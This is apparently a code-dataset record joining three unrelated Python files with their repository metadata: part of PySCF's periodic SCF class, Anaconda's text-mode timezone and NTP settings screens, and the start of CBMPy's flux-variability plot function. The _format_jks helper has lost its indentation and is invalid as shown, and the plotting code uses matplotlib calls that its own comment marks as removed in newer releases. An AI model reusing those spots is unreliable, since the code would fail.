        where r,s are orbitals on kpt. p and q are orbitals on kpts_band
        if kpts_band is given otherwise p and q are orbitals on kpt.
        '''
        return self.get_jk(cell, dm, hermi, kpt, kpts_band, with_k=False,
                           omega=omega)[0]

    def get_k(self, cell=None, dm=None, hermi=1, kpt=None, kpts_band=None,
              omega=None):
        '''Compute K matrix for the given density matrix.
        '''
        return self.get_jk(cell, dm, hermi, kpt, kpts_band, with_j=False,
                           omega=omega)[1]

    def get_veff(self, cell=None, dm=None, dm_last=0, vhf_last=0, hermi=1,
                 kpt=None, kpts_band=None):
        '''Hartree-Fock potential matrix for the given density matrix.
        See :func:`scf.hf.get_veff` and :func:`scf.hf.RHF.get_veff`
        '''
        if cell is None: cell = self.cell
        if dm is None: dm = self.make_rdm1()
        if kpt is None: kpt = self.kpt
        if self.rsjk and self.direct_scf:
            # Enable direct-SCF for real space JK builder
            ddm = dm - dm_last
            vj, vk = self.get_jk(cell, ddm, hermi, kpt, kpts_band)
            vhf = vj - vk * .5
            vhf += vhf_last
        else:
            vj, vk = self.get_jk(cell, dm, hermi, kpt, kpts_band)
            vhf = vj - vk * .5
        return vhf

    def get_jk_incore(self, cell=None, dm=None, hermi=1, kpt=None, omega=None,
                      **kwargs):
        '''Get Coulomb (J) and exchange (K) following :func:`scf.hf.RHF.get_jk_`.

        *Incore* version of Coulomb and exchange build only.

        Currently RHF always uses PBC AO integrals (unlike RKS), since
        exchange is currently computed by building PBC AO integrals.
        '''
        if omega:
            raise NotImplementedError
        if cell is None: cell = self.cell
        if kpt is None: kpt = self.kpt
        if self._eri is None:
            self._eri = self.with_df.get_ao_eri(kpt, compact=True)
        return self.get_jk(cell, dm, hermi, kpt)

    def energy_nuc(self):
        return self.cell.energy_nuc()

    # Bind the module-level helpers as methods.
    get_bands = get_bands
    get_rho = get_rho

    @lib.with_doc(dip_moment.__doc__)
    def dip_moment(self, cell=None, dm=None, unit='Debye', verbose=logger.NOTE,
                   **kwargs):
        rho = kwargs.pop('rho', None)
        if rho is None:
            rho = self.get_rho(dm)
        if cell is None:
            cell = self.cell
        return dip_moment(cell, dm, unit, verbose, rho=rho, kpt=self.kpt, **kwargs)

    def _finalize(self):
        '''Hook for dumping results and clearing up the object.'''
        mol_hf.SCF._finalize(self)
        # Report Makov-Payne corrections for charged cells.
        if self.cell.charge != 0:
            makov_payne_correction(self)
        return self

    def get_init_guess(self, cell=None, key='minao'):
        if cell is None: cell = self.cell
        dm = mol_hf.SCF.get_init_guess(self, cell, key)
        # Rescale so the guess integrates to the right electron count.
        dm = normalize_dm_(self, dm)
        return dm

    def init_guess_by_1e(self, cell=None):
        if cell is None: cell = self.cell
        if cell.dimension < 3:
            logger.warn(self, 'Hcore initial guess is not recommended in '
                        'the SCF of low-dimensional systems.')
        return mol_hf.SCF.init_guess_by_1e(self, cell)

    def init_guess_by_chkfile(self, chk=None, project=None, kpt=None):
        if chk is None: chk = self.chkfile
        if kpt is None: kpt = self.kpt
        return init_guess_by_chkfile(self.cell, chk, project, kpt)

    def from_chk(self, chk=None, project=None, kpt=None):
        # Alias of init_guess_by_chkfile.
        return self.init_guess_by_chkfile(chk, project, kpt)

    def dump_chk(self, envs):
        if self.chkfile:
            mol_hf.SCF.dump_chk(self, envs)
            with h5py.File(self.chkfile, 'a') as fh5:
                fh5['scf/kpt'] = self.kpt
        return self

    def _is_mem_enough(self):
        nao = self.cell.nao_nr()
        if abs(self.kpt).sum() < 1e-9:
            # Gamma point: real integrals (8 bytes each, with permutation
            # symmetry factor 4 -- presumably; confirm against dot_eri_dm).
            mem_need = nao**4*8/4/1e6
        else:
            # General k-point: complex integrals (16 bytes each).
            mem_need = nao**4*16/1e6
        return mem_need + lib.current_memory()[0] < self.max_memory*.95

    def density_fit(self, auxbasis=None, with_df=None):
        from pyscf.pbc.df import df_jk
        return df_jk.density_fit(self, auxbasis, with_df=with_df)

    def rs_density_fit(self, auxbasis=None, with_df=None):
        from pyscf.pbc.df import rsdf_jk
        return rsdf_jk.density_fit(self, auxbasis, with_df=with_df)

    def mix_density_fit(self, auxbasis=None, with_df=None):
        from pyscf.pbc.df import mdf_jk
        return mdf_jk.density_fit(self, auxbasis, with_df=with_df)

    def sfx2c1e(self):
        from pyscf.pbc.x2c import sfx2c1e
        return sfx2c1e.sfx2c1e(self)
    x2c = x2c1e = sfx2c1e

    def to_rhf(self, mf):
        '''Convert the input mean-field object to a RHF/ROHF/RKS/ROKS object'''
        return addons.convert_to_rhf(mf)

    def to_uhf(self, mf):
        '''Convert the input mean-field object to a UHF/UKS object'''
        return addons.convert_to_uhf(mf)

    def to_ghf(self, mf):
        '''Convert the input mean-field object to a GHF/GKS object'''
        return addons.convert_to_ghf(mf)

    def nuc_grad_method(self, *args, **kwargs):
        raise NotImplementedError

    def jk_method(self, J='FFTDF', K=None):
        '''
        Set up the schemes to evaluate Coulomb and exchange matrix

        FFTDF: planewave density fitting using Fast Fourier Transform
        AFTDF: planewave density fitting using analytic Fourier Transform
        GDF: Gaussian density fitting
        MDF: Gaussian and planewave mix density fitting
        RS: range-separation JK builder
        RSDF: range-separation density fitting
        '''
        if K is None:
            K = J
        if J != K:
            raise NotImplementedError('J != K')

        if 'DF' in J or 'DF' in K:
            if 'DF' in J and 'DF' in K:
                assert J == K
            else:
                # NOTE(review): unreachable after the J != K check above.
                df_method = J if 'DF' in J else K
                self.with_df = getattr(df, df_method)(self.cell, self.kpt)

        if 'RS' in J or 'RS' in K:
            if not gamma_point(self.kpt):
                raise NotImplementedError('Single k-point must be gamma point')
            self.rsjk = RangeSeparationJKBuilder(self.cell, self.kpt)
            self.rsjk.verbose = self.verbose

            # For nuclear attraction
            if J == 'RS' and K == 'RS' and not isinstance(self.with_df, df.GDF):
                self.with_df = df.GDF(self.cell, self.kpt)

        nuc = self.with_df.__class__.__name__
        logger.debug1(self, 'Apply %s for J, %s for K, %s for nuc', J, K, nuc)
        return self
class RHF(SCF, mol_hf.RHF):
    '''RHF adapted for PBCs at a single k-point.'''

    # Reuse the molecular RHF stability analysis.
    stability = mol_hf.RHF.stability

    def convert_from_(self, mf):
        '''Convert given mean-field object to RHF'''
        addons.convert_to_rhf(mf, self)
        return self
def _format_jks(vj, dm, kpts_band):
if kpts_band is None:
vj = vj.reshape(dm.shape)
elif kpts_band.ndim == 1: # a single k-point on bands
vj = vj.reshape(dm.shape)
elif getattr(dm, "ndim", 0) == 2:
vj = vj[0]
return vj
def normalize_dm_(mf, dm):
    '''
    Scale density matrix to make it produce the correct number of electrons.
    '''
    cell = mf.cell
    ovlp = mf.get_ovlp(cell)
    # Tr(dm . S) counts electrons; a stacked DM sums over its leading axis too.
    if isinstance(dm, np.ndarray) and dm.ndim == 2:
        nelec = np.einsum('ij,ji->', dm, ovlp).real
    else:
        nelec = np.einsum('xij,ji->', dm, ovlp).real
    if abs(nelec - cell.nelectron).sum() > 1e-7:
        logger.debug(mf, 'Big error detected in the electron number '
                     'of initial guess density matrix (Ne/cell = %g)!\n'
                     ' This can cause huge error in Fock matrix and '
                     'lead to instability in SCF for low-dimensional '
                     'systems.\n DM is normalized wrt the number '
                     'of electrons %s', nelec, cell.nelectron)
        # Rescale in place so callers holding the same array see the fix.
        dm *= cell.nelectron / nelec
    return dm
| sunqm/pyscf | pyscf/pbc/scf/hf.py | Python | apache-2.0 | 32,323 | [
"CRYSTAL",
"Gaussian",
"PySCF"
] | 11675282fa5c18eebf20847d3b497d6a13d3bc0637ebf1e89c3c15e16df8805a |
# Timezone text spoke
#
# Copyright (C) 2012 Red Hat, Inc.
#
# This copyrighted material is made available to anyone wishing to use,
# modify, copy, or redistribute it subject to the terms and conditions of
# the GNU General Public License v.2, or (at your option) any later version.
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY expressed or implied, including the implied warranties of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General
# Public License for more details. You should have received a copy of the
# GNU General Public License along with this program; if not, write to the
# Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301, USA. Any Red Hat trademarks that are incorporated in the
# source code or documentation are not subject to the GNU General Public
# License and may only be used or replicated with the express permission of
# Red Hat, Inc.
#
from pyanaconda.modules.common.constants.services import TIMEZONE
from pyanaconda.ui.categories.localization import LocalizationCategory
from pyanaconda.ui.tui.spokes import NormalTUISpoke
from pyanaconda.ui.common import FirstbootSpokeMixIn
from pyanaconda import timezone
from pyanaconda import ntp
from pyanaconda.core import constants
from pyanaconda.core.i18n import N_, _, C_
from pyanaconda.threading import threadMgr, AnacondaThread
from pyanaconda.flags import flags
from collections import OrderedDict, namedtuple
from threading import RLock
from simpleline.render.containers import ListColumnContainer
from simpleline.render.screen import InputState
from simpleline.render.widgets import TextWidget
from simpleline.render.screen_handler import ScreenHandler
from simpleline.render.prompt import Prompt
from pyanaconda.anaconda_loggers import get_module_logger
log = get_module_logger(__name__)
# (region, timezone) pair handed to the timezone-selection callbacks.
CallbackTimezoneArgs = namedtuple("CallbackTimezoneArgs", ["region", "timezone"])
def format_ntp_status_list(servers):
    """Render each NTP server together with its check status.

    :param servers: mapping of server address -> NTP_SERVER_* state constant
    :returns: list of "address (status text)" strings, in mapping order
    """
    state_text = {
        constants.NTP_SERVER_OK: _("status: working"),
        constants.NTP_SERVER_NOK: _("status: not working"),
        constants.NTP_SERVER_QUERY: _("checking status"),
    }
    return ["%s (%s)" % (address, state_text[state])
            for address, state in servers.items()]
# Public API of this module.
__all__ = ["TimeSpoke"]
class TimeSpoke(FirstbootSpokeMixIn, NormalTUISpoke):
    '''Text-mode spoke for configuring the timezone and NTP servers.'''

    helpFile = "DateTimeSpoke.txt"
    category = LocalizationCategory

    def __init__(self, data, storage, payload):
        NormalTUISpoke.__init__(self, data, storage, payload)
        self.title = N_("Time settings")
        self._timezone_spoke = None
        self._container = None
        # we use an ordered dict to keep the NTP server insertion order
        self._ntp_servers = OrderedDict()
        self._ntp_servers_lock = RLock()
        self._timezone_module = TIMEZONE.get_proxy()

    @property
    def indirect(self):
        # Shown directly on the hub.
        return False

    def initialize(self):
        self.initialize_start()
        # We get the initial NTP servers (if any):
        # - from kickstart when running inside of Anaconda
        #   during the installation
        # - from config files when running in Initial Setup
        #   after the installation
        ntp_servers = []
        if constants.ANACONDA_ENVIRON in flags.environs:
            ntp_servers = self._timezone_module.NTPServers
        elif constants.FIRSTBOOT_ENVIRON in flags.environs:
            ntp_servers = ntp.get_servers_from_config()[1]  # returns a (NTP pools, NTP servers) tuple
        else:
            log.error("tui time spoke: unsupported environment configuration %s,"
                      "can't decide where to get initial NTP servers", flags.environs)

        # check if the NTP servers appear to be working or not
        if ntp_servers:
            for server in ntp_servers:
                self._ntp_servers[server] = constants.NTP_SERVER_QUERY

            # check if the newly added NTP servers work fine
            self._check_ntp_servers_async(self._ntp_servers.keys())

        # we assume that the NTP spoke is initialized enough even if some NTP
        # server check threads might still be running
        self.initialize_done()

    def _check_ntp_servers_async(self, servers):
        """Asynchronously check if given NTP servers appear to be working.

        :param list servers: list of servers to check
        """
        for server in servers:
            threadMgr.add(AnacondaThread(prefix=constants.THREAD_NTP_SERVER_CHECK,
                                         target=self._check_ntp_server,
                                         args=(server,)))

    def _check_ntp_server(self, server):
        """Check if an NTP server appears to be working.

        :param str server: NTP server address
        :returns: True if the server appears to be working, False if not
        :rtype: bool
        """
        log.debug("checking NTP server %s", server)
        result = ntp.ntp_server_working(server)
        if result:
            log.debug("NTP server %s appears to be working", server)
            self.set_ntp_server_status(server, constants.NTP_SERVER_OK)
        else:
            log.debug("NTP server %s appears not to be working", server)
            self.set_ntp_server_status(server, constants.NTP_SERVER_NOK)

    @property
    def ntp_servers(self):
        """Return a list of NTP servers known to the Time spoke.

        :returns: a list of NTP servers
        :rtype: list of strings
        """
        return self._ntp_servers

    def add_ntp_server(self, server):
        """Add NTP server address to our internal NTP server tracking dictionary.

        :param str server: NTP server address to add
        """
        # the add & remove operations should (at least at the moment) be never
        # called from different threads at the same time, but lets just use
        # a lock there when we are at it
        with self._ntp_servers_lock:
            if server not in self._ntp_servers:
                self._ntp_servers[server] = constants.NTP_SERVER_QUERY
                self._check_ntp_servers_async([server])

    def remove_ntp_server(self, server):
        """Remove NTP server address from our internal NTP server tracking dictionary.

        :param str server: NTP server address to remove
        """
        # the remove-server and set-server-status operations need to be atomic,
        # so that we avoid reintroducing removed servers by setting their status
        with self._ntp_servers_lock:
            if server in self._ntp_servers:
                del self._ntp_servers[server]

    def set_ntp_server_status(self, server, status):
        """Set status for an NTP server in the NTP server dict.

        The status can be "working", "not working" or "check in progress",
        and is defined by three constants defined in constants.py.

        :param str server: an NTP server
        :param int status: status of the NTP server
        """
        # the remove-server and set-server-status operations need to be atomic,
        # so that we avoid reintroducing removed server by setting their status
        with self._ntp_servers_lock:
            if server in self._ntp_servers:
                self._ntp_servers[server] = status

    @property
    def timezone_spoke(self):
        # Lazily created modal sub-spoke for timezone selection.
        if not self._timezone_spoke:
            self._timezone_spoke = TimeZoneSpoke(self.data, self.storage, self.payload)
        return self._timezone_spoke

    @property
    def completed(self):
        return bool(self._timezone_module.Timezone)

    @property
    def mandatory(self):
        return True

    @property
    def status(self):
        kickstart_timezone = self._timezone_module.Timezone
        if kickstart_timezone:
            return _("%s timezone") % kickstart_timezone
        else:
            return _("Timezone is not set.")

    def _summary_text(self):
        """Return summary of current timezone & NTP configuration.

        :returns: current status
        :rtype: str
        """
        msg = ""
        # timezone
        kickstart_timezone = self._timezone_module.Timezone
        timezone_msg = _("not set")
        if kickstart_timezone:
            timezone_msg = kickstart_timezone
        msg += _("Timezone: %s\n") % timezone_msg

        # newline section separator
        msg += "\n"

        # NTP
        msg += _("NTP servers:")
        if self._ntp_servers:
            for status in format_ntp_status_list(self._ntp_servers):
                msg += "\n%s" % status
        else:
            msg += _("not configured")
        return msg

    def refresh(self, args=None):
        NormalTUISpoke.refresh(self, args)
        summary = self._summary_text()
        self.window.add_with_separator(TextWidget(summary))
        if self._timezone_module.Timezone:
            timezone_option = _("Change timezone")
        else:
            timezone_option = _("Set timezone")
        self._container = ListColumnContainer(1, columns_width=78, spacing=1)
        self._container.add(TextWidget(timezone_option), callback=self._timezone_callback)
        self._container.add(TextWidget(_("Configure NTP servers")), callback=self._configure_ntp_server_callback)
        self.window.add_with_separator(self._container)

    def _timezone_callback(self, data):
        ScreenHandler.push_screen_modal(self.timezone_spoke)
        self.close()

    def _configure_ntp_server_callback(self, data):
        new_spoke = NTPServersSpoke(self.data, self.storage, self.payload, self)
        ScreenHandler.push_screen_modal(new_spoke)
        self.apply()
        self.close()

    def input(self, args, key):
        """ Handle the input - visit a sub spoke or go back to hub."""
        if self._container.process_user_input(key):
            return InputState.PROCESSED
        else:
            return super().input(args, key)

    def apply(self):
        # update the NTP server list in kickstart
        self._timezone_module.SetNTPServers(list(self.ntp_servers.keys()))
class TimeZoneSpoke(NormalTUISpoke):
    """Modal spoke for picking a timezone by region/city.

       .. inheritance-diagram:: TimeZoneSpoke
          :parts: 3
    """
    category = LocalizationCategory

    def __init__(self, data, storage, payload):
        super().__init__(data, storage, payload)
        self.title = N_("Timezone settings")
        self._container = None
        # it's stupid to call get_all_regions_and_timezones twice, but regions
        # needs to be unsorted in order to display in the same order as the GUI
        # so whatever
        self._regions = list(timezone.get_all_regions_and_timezones().keys())
        self._timezones = dict((k, sorted(v)) for k, v in timezone.get_all_regions_and_timezones().items())
        self._lower_regions = [r.lower() for r in self._regions]
        self._zones = ["%s/%s" % (region, z) for region in self._timezones for z in self._timezones[region]]
        # for lowercase lookup
        # NOTE(review): entries here omit the "Region/" prefix while
        # self._zones includes it, so typing a full "Region/City" string
        # will not match this list -- confirm this is intended.
        self._lower_zones = [z.lower().replace("_", " ") for region in self._timezones for z in self._timezones[region]]
        self._selection = ""
        self._timezone_module = TIMEZONE.get_proxy()

    @property
    def indirect(self):
        return True

    def refresh(self, args=None):
        """args is None if we want a list of zones or "zone" to show all timezones in that zone."""
        super().refresh(args)
        self._container = ListColumnContainer(3, columns_width=24)
        if args and args in self._timezones:
            self.window.add(TextWidget(_("Available timezones in region %s") % args))
            for tz in self._timezones[args]:
                self._container.add(TextWidget(tz), self._select_timezone_callback, CallbackTimezoneArgs(args, tz))
        else:
            self.window.add(TextWidget(_("Available regions")))
            for region in self._regions:
                self._container.add(TextWidget(region), self._select_region_callback, region)
        self.window.add_with_separator(self._container)

    def _select_timezone_callback(self, data):
        self._selection = "%s/%s" % (data.region, data.timezone)
        self.apply()
        self.close()

    def _select_region_callback(self, data):
        region = data
        selected_timezones = self._timezones[region]
        # A region with a single timezone is selected immediately,
        # otherwise re-render this spoke listing the region's timezones.
        if len(selected_timezones) == 1:
            self._selection = "%s/%s" % (region, selected_timezones[0])
            self.apply()
            self.close()
        else:
            ScreenHandler.replace_screen(self, region)

    def input(self, args, key):
        if self._container.process_user_input(key):
            return InputState.PROCESSED
        else:
            # Free-text input: try a timezone name, then a region name.
            if key.lower().replace("_", " ") in self._lower_zones:
                index = self._lower_zones.index(key.lower().replace("_", " "))
                self._selection = self._zones[index]
                self.apply()
                return InputState.PROCESSED_AND_CLOSE
            elif key.lower() in self._lower_regions:
                index = self._lower_regions.index(key.lower())
                if len(self._timezones[self._regions[index]]) == 1:
                    self._selection = "%s/%s" % (self._regions[index],
                                                 self._timezones[self._regions[index]][0])
                    self.apply()
                    self.close()
                else:
                    ScreenHandler.replace_screen(self, self._regions[index])
                return InputState.PROCESSED
            # TRANSLATORS: 'b' to go back
            elif key.lower() == C_('TUI|Spoke Navigation|Time Settings', 'b'):
                ScreenHandler.replace_screen(self)
                return InputState.PROCESSED
            else:
                # Unrecognized input is passed back to the framework.
                return key

    def prompt(self, args=None):
        """ Customize default prompt. """
        prompt = NormalTUISpoke.prompt(self, args)
        prompt.set_message(_("Please select the timezone. Use numbers or type names directly"))
        # TRANSLATORS: 'b' to go back
        prompt.add_option(C_('TUI|Spoke Navigation|Time Settings', 'b'), _("back to region list"))
        return prompt

    def apply(self):
        self._timezone_module.SetTimezone(self._selection)
        self._timezone_module.SetKickstarted(False)
class NTPServersSpoke(NormalTUISpoke):
    '''Modal spoke listing NTP servers with add/remove actions.'''

    category = LocalizationCategory

    def __init__(self, data, storage, payload, time_spoke):
        super().__init__(data, storage, payload)
        self.title = N_("NTP configuration")
        self._container = None
        # Parent TimeSpoke: owns the tracked NTP server dictionary.
        self._time_spoke = time_spoke

    @property
    def indirect(self):
        return True

    def _summary_text(self):
        """Return summary of NTP configuration."""
        msg = _("NTP servers:")
        if self._time_spoke.ntp_servers:
            for status in format_ntp_status_list(self._time_spoke.ntp_servers):
                msg += "\n%s" % status
        else:
            msg += _("no NTP servers have been configured")
        return msg

    def refresh(self, args=None):
        super().refresh(args)
        summary = self._summary_text()
        self.window.add_with_separator(TextWidget(summary))
        self._container = ListColumnContainer(1, columns_width=78, spacing=1)
        self._container.add(TextWidget(_("Add NTP server")), self._add_ntp_server)
        # only add the remove option when we can remove something
        if self._time_spoke.ntp_servers:
            self._container.add(TextWidget(_("Remove NTP server")), self._remove_ntp_server)
        self.window.add_with_separator(self._container)

    def _add_ntp_server(self, data):
        new_spoke = AddNTPServerSpoke(self.data, self.storage, self.payload, self._time_spoke)
        ScreenHandler.push_screen_modal(new_spoke)
        self.redraw()

    def _remove_ntp_server(self, data):
        new_spoke = RemoveNTPServerSpoke(self.data, self.storage, self.payload, self._time_spoke)
        ScreenHandler.push_screen_modal(new_spoke)
        self.redraw()

    def input(self, args, key):
        if self._container.process_user_input(key):
            return InputState.PROCESSED
        else:
            return super().input(args, key)

    def apply(self):
        # The parent TimeSpoke applies the NTP server list; nothing to do here.
        pass
class AddNTPServerSpoke(NormalTUISpoke):
    '''Modal spoke that reads a single NTP server address from the user.'''

    category = LocalizationCategory

    def __init__(self, data, storage, payload, time_spoke):
        super().__init__(data, storage, payload)
        self.title = N_("Add NTP server address")
        self._time_spoke = time_spoke
        self._new_ntp_server = None
        self.value = None

    @property
    def indirect(self):
        return True

    def refresh(self, args=None):
        super().refresh(args)
        # Forget any previously entered value on redraw.
        self.value = None

    def prompt(self, args=None):
        # the title is enough, no custom prompt is needed
        if self.value is None:  # first run or nothing entered
            return Prompt(_("Enter an NTP server address and press %s") % Prompt.ENTER)

        # an NTP server address has been entered
        self._new_ntp_server = self.value
        self.apply()
        self.close()
        # NOTE(review): implicitly returns None here -- presumably the
        # framework skips prompting once the spoke is closed; confirm.

    def input(self, args, key):
        # we accept any string as NTP server address, as we do an automatic
        # working/not-working check on the address later
        self.value = key
        return InputState.DISCARDED

    def apply(self):
        if self._new_ntp_server:
            self._time_spoke.add_ntp_server(self._new_ntp_server)
class RemoveNTPServerSpoke(NormalTUISpoke):
    '''Modal spoke for removing one NTP server chosen by its list number.'''

    category = LocalizationCategory

    def __init__(self, data, storage, payload, timezone_spoke):
        super().__init__(data, storage, payload)
        self.title = N_("Select an NTP server to remove")
        self._time_spoke = timezone_spoke
        # Zero-based index into the tracked server dict, set by input().
        self._ntp_server_index = None

    @property
    def indirect(self):
        return True

    def _summary_text(self):
        """Return a numbered listing of NTP servers."""
        msg = ""
        for index, status in enumerate(format_ntp_status_list(self._time_spoke.ntp_servers), start=1):
            msg += "%d) %s" % (index, status)
            if index < len(self._time_spoke.ntp_servers):
                msg += "\n"
        return msg

    def refresh(self, args=None):
        super().refresh(args)
        summary = self._summary_text()
        self.window.add_with_separator(TextWidget(summary))

    def input(self, args, key):
        try:
            num = int(key)
        except ValueError:
            return super().input(args, key)

        # we expect a number corresponding to one of the NTP servers
        # in the listing - the server corresponding to the number will be
        # removed from the NTP server tracking (ordered) dict
        if num > 0 and num <= len(self._time_spoke.ntp_servers):
            self._ntp_server_index = num - 1
            self.apply()
            return InputState.PROCESSED_AND_CLOSE
        else:
            # the user entered a number that is out of range of the
            # available NTP servers, ignore it and stay in spoke
            return InputState.DISCARDED

    def apply(self):
        if self._ntp_server_index is not None:
            ntp_server_address = list(self._time_spoke.ntp_servers.keys())[self._ntp_server_index]
            self._time_spoke.remove_ntp_server(ntp_server_address)
| atodorov/anaconda | pyanaconda/ui/tui/spokes/time_spoke.py | Python | gpl-2.0 | 19,410 | [
"VisIt"
] | a69ce1b82784b8e52c12e631cf07b80f2a6686dcb5c4915a22869a29667945c9 |
"""
CBMPy: CBPlot module
====================
PySCeS Constraint Based Modelling (http://cbmpy.sourceforge.net)
Copyright (C) 2009-2022 Brett G. Olivier, VU University Amsterdam, Amsterdam, The Netherlands
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>
Author: Brett G. Olivier
Contact email: bgoli@users.sourceforge.net
Last edit: $Author: bgoli $ ($Id: CBPlot.py 710 2020-04-27 14:22:34Z bgoli $)
"""
# preparing for Python 3 port
from __future__ import division, print_function
from __future__ import absolute_import
# from __future__ import unicode_literals
import os
import time
import gc
import numpy
from . import CBWrite, CBTools
from .CBConfig import __CBCONFIG__ as __CBCONFIG__
__DEBUG__ = __CBCONFIG__['DEBUG']
__version__ = __CBCONFIG__['VERSION']
_HAVE_MATPLOTLIB_ = True
try:
import matplotlib
import matplotlib.pyplot as pyplot
except ImportError:
print('No Matplotlib available')
matplotlib = None
pyplot = None
_HAVE_MATPLOTLIB_ = False
def plotFluxVariability(
    fva_data,
    fva_names,
    fname,
    work_dir=None,
    title=None,
    ySlice=None,
    minHeight=None,
    maxHeight=None,
    roundec=None,
    autoclose=True,
    fluxval=True,
    type='png',
):
    """
    Plots and saves as an image the flux variability results as generated by CBSolver.FluxVariabilityAnalysis.

    - *fva_data* FluxVariabilityAnalysis() FVA OUTPUT_ARRAY
    - *fva_names* FluxVariabilityAnalysis() FVA OUTPUT_NAMES
    - *fname* filename_base for the CSV output
    - *work_dir* [default=None] if set the output directory for the csv files
    - *title* [default=None] the user defined title for the graph
    - *ySlice* [default=None] this sets an absolute (fixed) limit on the Y-axis (+- ySlice)
    - *minHeight* [default=None] the minimum length that defined a span
    - *maxHeight* [default=None] the maximum length a span can obtain, bar will be limited to maxHeight and coloured yellow
    - *roundec* [default=None] an integer indicating at which decimal to round off output. Default is no rounding.
    - *autoclose* [default=True] autoclose plot after save
    - *fluxval* [default=True] plot the flux value
    - *type* [default='png'] the output format, depends on matplotlib backend e.g. 'png', 'pdf', 'eps'
    """
    assert _HAVE_MATPLOTLIB_, "\nPlotting requires Matplotlib"
    l_cntr = 0  # x position (left corner) of the next bar
    c_width = 0.8  # bar width
    g_bars = []  # bar artist containers for the plotted reactions
    g_bars_lcorner = []  # left-corner positions, used to place x tick labels
    fba_val_lines = []  # horizontal marker lines at the FBA flux value
    vResults = {}  # name --> raw FVA row for every reaction actually plotted
    PLOTLOG = False  # linear y-axis
    outputNames = []  # labels of the reactions that were actually plotted
    Ymagic = []  # collected bar extents used to autoscale the y-axis
    matplotlib.pyplot.figure(num=5, figsize=(16, 9))
    # NOTE(review): pyplot.hold() and the bar(left=..., hold=...) keywords were
    # removed in matplotlib >= 3.0; kept here for the matplotlib versions this
    # module targets - confirm before upgrading matplotlib.
    pyplot.hold(True)
    for r in range(fva_data.shape[0]):
        HASMIN = False
        HASMAX = False
        # column layout: 0 = FBA flux value, 2 = FVA minimum, 3 = FVA maximum
        if roundec is None:
            fv_min = fva_data[r, 2]
            fv_fba = fva_data[r, 0]
            fv_max = fva_data[r, 3]
        else:
            fv_min = round(fva_data[r, 2], roundec)
            fv_fba = round(fva_data[r, 0], roundec)
            fv_max = round(fva_data[r, 3], roundec)
        # BUGFIX: the original guards compared "value != numpy.NaN", which is
        # always True (NaN never compares equal to anything, itself included);
        # numpy.isnan() expresses the intended "skip undefined entries" check.
        if not numpy.isnan(fv_fba):
            if not numpy.isnan(fv_min) and fv_min < fv_fba:
                HASMIN = True
            if not numpy.isnan(fv_max) and fv_max > fv_fba:
                HASMAX = True
        # total variability span (length of the bar to draw)
        b_height = 0.0
        b_height1 = 0.0
        b_height2 = 0.0
        if HASMAX:
            b_height1 = fv_max - fv_fba
        if HASMIN:
            b_height2 = fv_fba - fv_min
        b_height = abs(b_height1) + abs(b_height2)
        # apply the user supplied span filters
        HCheckMin = False
        HCheckMax = False
        if minHeight is None:
            HCheckMin = True
        elif b_height >= minHeight:
            HCheckMin = True
        if maxHeight is None:
            HCheckMax = True
        elif b_height <= maxHeight:
            HCheckMax = True
        if b_height > 0.0 and HCheckMin and HCheckMax:
            # span within limits: draw a default-coloured bar
            outputNames.append(fva_names[r])
            if HASMIN:
                bottom = fv_min
            else:
                bottom = fv_fba
            Ymagic.append(bottom)
            Ymagic.append(bottom + b_height)
            g_bars.append(
                matplotlib.pyplot.bar(
                    left=l_cntr,
                    height=b_height,
                    width=c_width,
                    bottom=bottom,
                    log=PLOTLOG,
                    hold=True,
                )
            )
            if fluxval:
                # mark the FBA flux value with a red horizontal line
                fba_val_lines.append(
                    matplotlib.pyplot.hlines(
                        fv_fba,
                        g_bars[-1][0].get_x(),
                        g_bars[-1][0].get_x() + g_bars[-1][0].get_width(),
                        colors='r',
                        linestyles='solid',
                        lw=2,
                    )
                )
            g_bars_lcorner.append(l_cntr)
            l_cntr += c_width
            vResults.update({fva_names[r]: fva_data[r].copy()})
        elif b_height > 0.0 and HCheckMin:
            # reaching here means HCheckMax failed, i.e. maxHeight is set and
            # the span exceeds it: clip the bar to +/- maxHeight around the
            # flux value and colour it yellow to flag the truncation
            outputNames.append(fva_names[r])
            if HASMIN:
                bottom = fv_min
            else:
                bottom = fv_fba
            if bottom < fv_fba - maxHeight:
                bottom = fv_fba - maxHeight
            if bottom + b_height > fv_fba + maxHeight:
                b_height = abs(fv_fba - bottom) + maxHeight
            Ymagic.append(bottom)
            Ymagic.append(bottom + b_height)
            g_bars.append(
                matplotlib.pyplot.bar(
                    left=l_cntr,
                    height=b_height,
                    width=c_width,
                    bottom=bottom,
                    log=PLOTLOG,
                    hold=True,
                    color='y',
                    lw=0.5,
                )
            )
            if fluxval:
                fba_val_lines.append(
                    matplotlib.pyplot.hlines(
                        fv_fba,
                        g_bars[-1][0].get_x(),
                        g_bars[-1][0].get_x() + g_bars[-1][0].get_width(),
                        colors='r',
                        linestyles='solid',
                        lw=2,
                    )
                )
            g_bars_lcorner.append(l_cntr)
            l_cntr += c_width
            vResults.update({fva_names[r]: fva_data[r].copy()})
    if __DEBUG__:
        print('len fva_names', len(fva_names))
    if __DEBUG__:
        print('len g_bars', len(g_bars))
    # prettify SBML-mangled compartment suffixes in the reaction labels
    outputNames = [l.replace('_LPAREN_e_RPAREN_', '_e') for l in outputNames]
    matplotlib.pyplot.xticks(
        numpy.array(g_bars_lcorner) + (c_width / 2.0),
        outputNames,
        rotation='vertical',
        size='xx-small',
    )
    if title is None:
        matplotlib.pyplot.title('%s has %i varying fluxes' % (fname, len(g_bars)))
    else:
        matplotlib.pyplot.title('%s' % (title))
    matplotlib.pyplot.ylabel('Variability')
    if len(Ymagic) > 0:
        # autoscale the y-axis to the plotted extents plus a 1% margin,
        # unless an absolute symmetric limit (ySlice) was requested
        yhi = max(Ymagic) + 0.01 * max(Ymagic)
        ylow = min(Ymagic) - abs(0.01 * min(Ymagic))
        if ySlice is not None:
            yhi = abs(ySlice)
            ylow = -abs(ySlice)
        matplotlib.pyplot.ylim(ylow, yhi)
        if __DEBUG__:
            print('Plotting y %s --> %s' % (ylow, yhi))
    if work_dir is not None:
